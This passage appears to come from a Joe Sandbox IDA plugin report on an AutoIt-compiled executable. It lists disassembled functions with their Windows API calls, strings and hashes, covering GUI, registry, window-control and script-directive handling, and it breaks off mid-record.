SELECTINVERT, xrefs: 007A057E
GETSELECTED, xrefs: 007A05E1
ISSELECTED, xrefs: 007A04DD
GETSUBITEMCOUNT, xrefs: 007A0384, 007A039F
SELECTALL, xrefs: 007A0515
GETSELECTEDCOUNT, xrefs: 007A0470, 007A048B
DESELECT, xrefs: 007A059C
SELECT, xrefs: 007A0548
FINDITEM, xrefs: 007A0627
SELECTCLEAR, xrefs: 007A052D
GETTEXT, xrefs: 007A03EC, 007A0407

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: c320ffafea1640fa0198e8688e232dfee5964d24892d59640537857e86f4db9b
Instruction ID: 482166180623ad31bfec196c76fa424adfe36d8a51dbb082ff732900b89e8576
Opcode Fuzzy Hash: c320ffafea1640fa0198e8688e232dfee5964d24892d59640537857e86f4db9b
Instruction Fuzzy Hash: 54E1C231208201DFCB18DF28C45596AB3E6BFCA314F544A6DF8969B3A1DB38ED45CB91

Function 00728891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00728968
GetSystemMetrics.USER32(00000007), ref: 00728970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0072899B
GetSystemMetrics.USER32(00000008), ref: 007289A3
GetSystemMetrics.USER32(00000004), ref: 007289C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007289E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007289F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00728A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00728A3C
GetClientRect.USER32(00000000,000000FF), ref: 00728A5A
GetStockObject.GDI32(00000011), ref: 00728A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00728A81

Part of subcall function 0072912D: GetCursorPos.USER32(?), ref: 00729141
Part of subcall function 0072912D: ScreenToClient.USER32(00000000,?), ref: 0072915E
Part of subcall function 0072912D: GetAsyncKeyState.USER32(00000001), ref: 00729183
Part of subcall function 0072912D: GetAsyncKeyState.USER32(00000002), ref: 0072919D

SetTimer.USER32(00000000,00000000,00000028,007290FC), ref: 00728AA8

Strings

AutoIt v3 GUI, xrefs: 00728A20

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 89d7d0c439e4ca71de77e43e8aa67e56dcf13b45239ce88f1f5c99c708b51046
Instruction ID: 0dd3d6f3f47ba72a18efbe996c5f4f997bb4bdaaaffd93b17bc9b4f36e94b4e1
Opcode Fuzzy Hash: 89d7d0c439e4ca71de77e43e8aa67e56dcf13b45239ce88f1f5c99c708b51046
Instruction Fuzzy Hash: 7DB1A071A01259EFDB14DF68DC85BAE3BB5FB48314F518129FA05AB290DB38E840CF55

Function 00770D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00771114
Part of subcall function 007710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771120
Part of subcall function 007710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 0077112F
Part of subcall function 007710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00770B9B,?,?,?), ref: 00771136
Part of subcall function 007710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0077114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00770DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00770E29
GetLengthSid.ADVAPI32(?), ref: 00770E40
GetAce.ADVAPI32(?,00000000,?), ref: 00770E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00770E96
GetLengthSid.ADVAPI32(?), ref: 00770EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00770EB5
HeapAlloc.KERNEL32(00000000), ref: 00770EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00770EDD
CopySid.ADVAPI32(00000000), ref: 00770EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00770F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00770F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00770F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770F6E
HeapFree.KERNEL32(00000000), ref: 00770F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770F7E
HeapFree.KERNEL32(00000000), ref: 00770F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00770F8E
HeapFree.KERNEL32(00000000), ref: 00770F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00770FA1
HeapFree.KERNEL32(00000000), ref: 00770FA8

Part of subcall function 00771193: GetProcessHeap.KERNEL32(00000008,00770BB1,?,00000000,?,00770BB1,?), ref: 007711A1
Part of subcall function 00771193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00770BB1,?), ref: 007711A8
Part of subcall function 00771193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00770BB1,?), ref: 007711B7

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: 5cec4432f3190834fb43302b69ad515fa6b80d0944febbd8eed5dc3f7cee670d
Instruction ID: 2645551991a30bcc0b5cded3c28126c47a0d355c033c54bc94b51c5c03b3310c
Opcode Fuzzy Hash: 5cec4432f3190834fb43302b69ad515fa6b80d0944febbd8eed5dc3f7cee670d
Instruction Fuzzy Hash: 39715C72A0020AFBDF21DFA4DC49BAEBBB8BF45340F048115F919A6191D7799A05CFA0

Function 0079C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0079C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,007ACC08,00000000,?,00000000,?,?), ref: 0079C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0079C5A4
_wcslen.LIBCMT ref: 0079C5F4
_wcslen.LIBCMT ref: 0079C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0079C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0079C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0079C84D
RegCloseKey.ADVAPI32(?), ref: 0079C881
RegCloseKey.ADVAPI32(00000000), ref: 0079C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0079C960

Strings

REG_BINARY, xrefs: 0079C913
REG_QWORD, xrefs: 0079C8C3
REG_DWORD, xrefs: 0079C804
REG_SZ, xrefs: 0079C644
REG_EXPAND_SZ, xrefs: 0079C5CD
REG_MULTI_SZ, xrefs: 0079C6F5

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: f73f8a343c9b1989c8bdab3afd3655934ec7cb4683a8284edfd5f712dfbc64d4
Instruction ID: 6fed43151c1e7ff8b7e2e84299a3485540fc2bc4a2d0e29aa8c2cee2ca46d8cd
Opcode Fuzzy Hash: f73f8a343c9b1989c8bdab3afd3655934ec7cb4683a8284edfd5f712dfbc64d4
Instruction Fuzzy Hash: F5126835604200DFDB15DF18D895A6AB7E5EF88714F14889CF84A9B3A2DB39FD81CB81

Function 007A091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007A09C6
_wcslen.LIBCMT ref: 007A0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007A0A54
_wcslen.LIBCMT ref: 007A0A8A
_wcslen.LIBCMT ref: 007A0B06
_wcslen.LIBCMT ref: 007A0B81

Part of subcall function 0072F9F2: _wcslen.LIBCMT ref: 0072F9FD

Part of subcall function 00772BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00772BFA

Strings

GETTOTALCOUNT, xrefs: 007A09F2, 007A0A17
GETITEMCOUNT, xrefs: 007A0C1E
CHECK, xrefs: 007A0A85, 007A0AA0
COLLAPSE, xrefs: 007A0B01, 007A0B1C
SELECT, xrefs: 007A0D11
ISCHECKED, xrefs: 007A0CE1
EXISTS, xrefs: 007A0B7C, 007A0B97
GETSELECTED, xrefs: 007A0C4E
UNCHECK, xrefs: 007A0D3E
GETTEXT, xrefs: 007A0C97
EXPAND, xrefs: 007A0BF8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 7c2c45f5a005b4d06800eefe41716ef6ab77a8b477f66cb18c2aec9cf5998212
Instruction ID: 22102b2c419446e4d3948f6fe2a1e7885ffef863ef856305f2adeda4cc06149d
Opcode Fuzzy Hash: 7c2c45f5a005b4d06800eefe41716ef6ab77a8b477f66cb18c2aec9cf5998212
Instruction Fuzzy Hash: 3DE19B72208301DFC714DF28C45096AB7E2BFD9314B148A5DF89A9B3A2D739ED85CB91

Function 0079C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0079B6AE,?,?), ref: 0079C9B5
_wcslen.LIBCMT ref: 0079C9F1
_wcslen.LIBCMT ref: 0079CA68
_wcslen.LIBCMT ref: 0079CA9E
_wcslen.LIBCMT ref: 0079CAF9
_wcslen.LIBCMT ref: 0079CB2F
_wcslen.LIBCMT ref: 0079CB7F

Strings

HKLM, xrefs: 0079CA98, 0079CA9D
HKEY_USERS, xrefs: 0079CBDF
HKCR, xrefs: 0079CB29, 0079CB2E
HKCC, xrefs: 0079CBAC
HKEY_LOCAL_MACHINE, xrefs: 0079CA62, 0079CA67
HKCU, xrefs: 0079CBCE
HKEY_CURRENT_USER, xrefs: 0079CBBD
HKU, xrefs: 0079CBF0
HKEY_CURRENT_CONFIG, xrefs: 0079CB79, 0079CB7E
HKEY_CLASSES_ROOT, xrefs: 0079CAF3, 0079CAF8

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 048d6748928f87a8de04e0264cc3e1e36c776c55dbcdc73eec03849d1f5f9155
Instruction ID: 62368458ed893a8d339d501f93f39e7cfd5c960ae59f3af31f748630178d38ee
Opcode Fuzzy Hash: 048d6748928f87a8de04e0264cc3e1e36c776c55dbcdc73eec03849d1f5f9155
Instruction Fuzzy Hash: 8371257260016A8BCF22DE3CED525BE33A1AF61760F544529F856A7285F63CDD80C3A0

Function 007A833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007A835A
_wcslen.LIBCMT ref: 007A836E
_wcslen.LIBCMT ref: 007A8391
_wcslen.LIBCMT ref: 007A83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007A83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,007A5BF2), ref: 007A844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007A8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007A84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007A8501
FreeLibrary.KERNEL32(?), ref: 007A850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007A851D
DestroyIcon.USER32(?,?,?,?,?,007A5BF2), ref: 007A852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007A8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007A8555

Strings

.dll, xrefs: 007A83AB
.icl, xrefs: 007A8368
.exe, xrefs: 007A8388

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 3c546f22ae403b8729255c5bceaf18d94430bc23034349420aa746d493149c4c
Instruction ID: bf52bd6586f31cf91310295902d3f75159927da9ee6e7efa8fe7d0dc06ca1abc
Opcode Fuzzy Hash: 3c546f22ae403b8729255c5bceaf18d94430bc23034349420aa746d493149c4c
Instruction Fuzzy Hash: 3061C271940215FEEB18DF64CC45BBE77A8BF89721F108609F815D61D1EB7CA990C7A0

Function 00717778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#notrayicon, xrefs: 007177E7
#include, xrefs: 00717847
#include-once, xrefs: 0071782F
Cannot parse #include, xrefs: 00755279
", xrefs: 00755153
#comments-start, xrefs: 0071785F, 007178B1
#requireadmin, xrefs: 007177FF
#comments-end, xrefs: 007178D9
Bad directive syntax error, xrefs: 0075519A
Unterminated group of comments, xrefs: 0075528C
', xrefs: 00755169
#cs, xrefs: 00717873, 007178C5
#OnAutoItStartRegister, xrefs: 00717817
#ce, xrefs: 007178ED
#pragma compile, xrefs: 007177D3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 779537241ddcdfb072efe08488db3353ebbea5f32e27fddb8d97f88d73ad70e0
Instruction ID: f09dcaa43f1ea316fb7c046ec9da676070d14e6097179b7961adf3a857325e1c
Opcode Fuzzy Hash: 779537241ddcdfb072efe08488db3353ebbea5f32e27fddb8d97f88d73ad70e0
Instruction Fuzzy Hash: 858104B0A40605FBDB25AF64CC56FEE3BB4AF55700F044024F905AA1D2EB7CD985C7A2

Function 00775A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00775A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00775A40
SetWindowTextW.USER32(?,?), ref: 00775A57
GetDlgItem.USER32(?,000003EA), ref: 00775A6C
SetWindowTextW.USER32(00000000,?), ref: 00775A72
GetDlgItem.USER32(?,000003E9), ref: 00775A82
SetWindowTextW.USER32(00000000,?), ref: 00775A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00775AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00775AC3
GetWindowRect.USER32(?,?), ref: 00775ACC
_wcslen.LIBCMT ref: 00775B33
SetWindowTextW.USER32(?,?), ref: 00775B6F
GetDesktopWindow.USER32 ref: 00775B75
GetWindowRect.USER32(00000000), ref: 00775B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00775BD3
GetClientRect.USER32(?,?), ref: 00775BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00775C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00775C2F

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 6b1e3756d91422d41eeb58383f73d4eae82763a1a3f3fd97cae9e14b9ead0468
Instruction ID: 64f358efd5f5c4895115346bb6da2064ba583947efab3f6fc9e95215ece1deb0
Opcode Fuzzy Hash: 6b1e3756d91422d41eeb58383f73d4eae82763a1a3f3fd97cae9e14b9ead0468
Instruction Fuzzy Hash: FF717E71900B09EFDF21DFA8CE85A6EBBF5FF48744F108918E146A25A0D7B8E944CB54

Function 007730F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0077318D
_wcslen.LIBCMT ref: 007731F8

Strings

REGEXPCLASS, xrefs: 00773255, 00773266
[}, xrefs: 0077339A
INSTANCE, xrefs: 00773453
NAME, xrefs: 00773335, 00773346
TEXT, xrefs: 0077347C
CLASSNN, xrefs: 007731F3, 00773204
CLASS, xrefs: 00773188, 007731A5

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[}
API String ID: 176396367-3465173759
Opcode ID: 27aa810b7de3fb5dd477533edb78d0a41f9c724d367dd1a9bd59df2230b9f62b
Instruction ID: 579df7f60cf39c993509c270a1abbcc8f0516337bc5cfdfcb879e0e638c306fb
Opcode Fuzzy Hash: 27aa810b7de3fb5dd477533edb78d0a41f9c724d367dd1a9bd59df2230b9f62b
Instruction Fuzzy Hash: 37E1E732A00516EBCF189F78C4556FDBBB0BF44790F54C12AE45AF7241DB38AE85A790

Function 007300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 007300C6

Part of subcall function 007300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(007E070C,00000FA0,E772790F,?,?,?,?,007523B3,000000FF), ref: 0073011C
Part of subcall function 007300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,007523B3,000000FF), ref: 00730127
Part of subcall function 007300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,007523B3,000000FF), ref: 00730138
Part of subcall function 007300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0073014E
Part of subcall function 007300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0073015C
Part of subcall function 007300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0073016A
Part of subcall function 007300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00730195
Part of subcall function 007300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 007301A0

___scrt_fastfail.LIBCMT ref: 007300E7

Part of subcall function 007300A3: __onexit.LIBCMT ref: 007300A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00730122
kernel32.dll, xrefs: 00730133
InitializeConditionVariable, xrefs: 00730148
WakeAllConditionVariable, xrefs: 00730162
SleepConditionVariableCS, xrefs: 00730154

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: a66d3b3912eebb0b712965ec9c228ec33c01245181882190efe500a9f5e641e2
Instruction ID: 15c34a5f8dd2c40da9e2568fefe82ec49589ed6ea8b58984281bc4a832319f22
Opcode Fuzzy Hash: a66d3b3912eebb0b712965ec9c228ec33c01245181882190efe500a9f5e641e2
Instruction Fuzzy Hash: E021FCB2B45714BBF7125BB4AC59B6E73A4DB86B51F004135F801A7292DBBC5C008AD4

Function 007844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,007ACC08), ref: 00784527
_wcslen.LIBCMT ref: 0078453B
_wcslen.LIBCMT ref: 00784599
_wcslen.LIBCMT ref: 007845F4
_wcslen.LIBCMT ref: 0078463F
_wcslen.LIBCMT ref: 007846A7

Part of subcall function 0072F9F2: _wcslen.LIBCMT ref: 0072F9FD

GetDriveTypeW.KERNEL32(?,007D6BF0,00000061), ref: 00784743

Strings

all, xrefs: 00784531, 00784536
unknown, xrefs: 00784708
network, xrefs: 0078469D, 007846A2
removable, xrefs: 007845EA, 007845EF
cdrom, xrefs: 0078458F, 00784594
fixed, xrefs: 00784635, 0078463A
ramdisk, xrefs: 007846F1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 340314b13e1d177f3c13982e7e8eb0769b10e3d260bda956ed1a6db465827155
